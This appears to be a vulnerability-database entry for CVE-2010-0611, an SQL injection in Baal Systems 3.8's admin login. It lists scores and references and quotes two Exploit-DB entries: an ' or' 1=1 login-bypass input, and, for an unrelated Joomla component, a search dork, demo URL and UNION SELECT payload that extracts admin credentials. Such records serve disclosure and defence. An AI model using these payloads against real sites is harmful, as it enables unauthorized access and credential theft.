CVE-2010-0611
Published: 2010-02-11
Priority: P347 · high · CVSS 2.0 score 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.97% (57.6th percentile)
Multiple SQL injection vulnerabilities in adminlogin.php in Baal Systems 3.8 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| baalsystems | baal_systems | <= 3.8 | — |
| baalsystems | baal_systems | — | — |
| baalsystems | baal_systems | — | — |
No detection rules found.
Exploit-DB
Joomla! Component Pulse Infotech Flip Wall - SQL Injection
exploitdb·2010-10-31
CVE-2010-4268 Joomla! Component Pulse Infotech Flip Wall - SQL Injection
---
Joomla Component com_flipwall SQL Injection Vulnerability
# Author : Fl0riX ~ Bug Researchers
# Name : Joomla com_flipwall
# Bug Type : SQL injection
# Dork: "com_flipwall"
# Infection : Admin login credentials can be obtained.
# Demo Vuln :
[+]http://0611.info/index.php?option=com_flipwall&controller=flipwall&catid=[EXPLOIT]
[+] Vendor: http://www.pulseextensions.com/
# Note: The demo site has a filter, just so you know :)
# Bug Fix Advice : Harmful characters should be filtered.
#############################################################
EXPLOIT :
null+union+select+1,2,3,4,5,concat(username,0x3a,password)fl0rix,7,8,9,10+from+jos_users--
Exploit-DB
Baal Systems 3.8 - Authentication Bypass
exploitdb·2010-02-07
CVE-2010-0611 Baal Systems 3.8 - Authentication Bypass
---
[+] Baal Systems
[+] Vuln Code :
[adminlogin.php]
[+] PoC :
[BaalSystems_path]/adminlogin.php
username: ' or' 1=1
Password: ' or' 1=1
No writeups or analysis indexed.
http://packetstormsecurity.org/1002-exploits/baalsystems-sql.txt
http://www.exploit-db.com/exploits/11346
http://www.securityfocus.com/bid/38139
https://exchange.xforce.ibmcloud.com/vulnerabilities/56147
2010-02-11
Published